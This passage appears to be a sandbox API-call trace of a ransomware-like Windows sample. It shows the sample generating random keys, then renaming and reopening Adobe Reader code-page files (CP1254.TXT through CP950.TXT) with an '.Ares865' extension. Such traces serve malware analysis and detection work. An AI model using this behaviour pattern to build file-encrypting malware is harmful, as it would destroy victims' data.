hTemplateFile=0x0) returned 0x118 [0155.161] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9236) returned 1 [0155.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0155.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0155.161] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.162] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.162] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.164] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.165] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.165] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.166] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP1254.TXT" | out: lpString1="CP1254.TXT") returned="CP1254.TXT" [0155.166] lstrlenW (lpString="CP1254.TXT") returned 10 [0155.166] lstrlenW (lpString="Ares865") returned 7 [0155.166] lstrcmpiW (lpString1="254.TXT", lpString2="Ares865") returned -1 [0155.166] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1254.TXT.Ares865") returned 101 [0155.166] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1254.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1254.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1254.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1254.txt.ares865"), dwFlags=0x1) returned 1 [0155.168] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1254.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1254.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.168] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9644) returned 1 [0155.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0155.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0155.168] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.169] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.169] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.172] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.172] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.172] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.173] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP1255.TXT" | out: lpString1="CP1255.TXT") returned="CP1255.TXT" [0155.173] lstrlenW (lpString="CP1255.TXT") returned 10 [0155.173] lstrlenW (lpString="Ares865") returned 7 [0155.173] lstrcmpiW (lpString1="255.TXT", lpString2="Ares865") returned -1 [0155.173] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1255.TXT.Ares865") returned 101 [0155.174] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1255.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1255.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1255.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1255.txt.ares865"), dwFlags=0x1) returned 1 [0155.176] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1255.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1255.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.176] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8602) returned 1 [0155.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0155.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0155.176] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.177] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.177] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.179] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.180] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.180] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.181] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP1256.TXT" | out: lpString1="CP1256.TXT") returned="CP1256.TXT" [0155.181] lstrlenW (lpString="CP1256.TXT") returned 10 [0155.181] lstrlenW (lpString="Ares865") returned 7 [0155.181] lstrcmpiW (lpString1="256.TXT", lpString2="Ares865") returned -1 [0155.181] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1256.TXT.Ares865") returned 101 [0155.181] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1256.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1256.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1256.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1256.txt.ares865"), dwFlags=0x1) returned 1 [0155.183] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1256.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1256.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.183] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8955) returned 1 [0155.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0155.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0155.183] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.184] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.184] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.186] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.187] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.187] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.188] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP1257.TXT" | out: lpString1="CP1257.TXT") returned="CP1257.TXT" [0155.188] lstrlenW (lpString="CP1257.TXT") returned 10 [0155.188] lstrlenW (lpString="Ares865") returned 7 [0155.188] lstrcmpiW (lpString1="257.TXT", lpString2="Ares865") returned -1 [0155.188] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1257.TXT.Ares865") returned 101 [0155.188] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1257.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1257.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1257.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1257.txt.ares865"), dwFlags=0x1) returned 1 [0155.190] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1257.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1257.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.190] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9516) returned 1 [0155.190] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.190] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0155.190] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0155.190] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.191] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.191] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.196] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.197] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.197] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.197] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP1258.TXT" | out: lpString1="CP1258.TXT") returned="CP1258.TXT" [0155.197] lstrlenW (lpString="CP1258.TXT") returned 10 [0155.198] lstrlenW (lpString="Ares865") returned 7 [0155.198] lstrcmpiW (lpString1="258.TXT", lpString2="Ares865") returned -1 [0155.198] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1258.TXT.Ares865") returned 101 [0155.198] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1258.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1258.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1258.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1258.txt.ares865"), dwFlags=0x1) returned 1 [0155.200] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1258.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1258.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.200] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9506) returned 1 [0155.200] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.200] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0155.200] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0155.200] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.201] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.201] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.204] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.204] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.204] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.205] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP874.TXT" | out: lpString1="CP874.TXT") returned="CP874.TXT" [0155.205] lstrlenW (lpString="CP874.TXT") returned 9 [0155.205] lstrlenW (lpString="Ares865") returned 7 [0155.205] lstrcmpiW (lpString1="874.TXT", lpString2="Ares865") returned -1 [0155.205] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP874.TXT.Ares865") returned 100 [0155.205] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP874.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp874.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP874.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp874.txt.ares865"), dwFlags=0x1) returned 1 [0155.207] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP874.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp874.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.207] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8737) returned 1 [0155.207] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.207] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0155.207] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0155.207] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.208] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.208] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.211] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.211] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.212] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.212] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP932.TXT" | out: lpString1="CP932.TXT") returned="CP932.TXT" [0155.212] lstrlenW (lpString="CP932.TXT") returned 9 [0155.212] lstrlenW (lpString="Ares865") returned 7 [0155.212] lstrcmpiW (lpString1="932.TXT", lpString2="Ares865") returned -1 [0155.213] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP932.TXT.Ares865") returned 100 [0155.213] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP932.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp932.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP932.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp932.txt.ares865"), dwFlags=0x1) returned 1 [0155.215] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP932.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp932.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.215] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=303346) returned 1 [0155.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0155.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0155.215] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.216] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.216] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.230] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.230] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.230] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.235] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP936.TXT" | out: lpString1="CP936.TXT") returned="CP936.TXT" [0155.235] lstrlenW (lpString="CP936.TXT") returned 9 [0155.235] lstrlenW (lpString="Ares865") returned 7 [0155.235] lstrcmpiW (lpString1="936.TXT", lpString2="Ares865") returned -1 [0155.235] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP936.TXT.Ares865") returned 100 [0155.235] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP936.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp936.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP936.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp936.txt.ares865"), dwFlags=0x1) returned 1 [0155.238] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP936.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp936.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.238] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=839399) returned 1 [0155.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0155.238] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.239] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.239] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.277] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.278] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.278] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.289] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP949.TXT" | out: lpString1="CP949.TXT") returned="CP949.TXT" [0155.289] lstrlenW (lpString="CP949.TXT") returned 9 [0155.289] lstrlenW (lpString="Ares865") returned 7 [0155.289] lstrcmpiW (lpString1="949.TXT", lpString2="Ares865") returned -1 [0155.290] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP949.TXT.Ares865") returned 100 [0155.290] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP949.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp949.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP949.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp949.txt.ares865"), dwFlags=0x1) returned 1 [0155.293] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP949.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp949.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.294] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=808082) returned 1 [0155.294] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.295] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.295] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.324] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.324] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.324] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.335] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP950.TXT" | out: lpString1="CP950.TXT") returned="CP950.TXT" [0155.335] lstrlenW (lpString="CP950.TXT") returned 9 [0155.335] lstrlenW (lpString="Ares865") returned 7 [0155.335] lstrcmpiW (lpString1="950.TXT", lpString2="Ares865") returned -1 [0155.336] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP950.TXT.Ares865") returned 100 [0155.336] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP950.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp950.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP950.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp950.txt.ares865"), dwFlags=0x1) returned 1 [0155.338] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP950.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp950.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 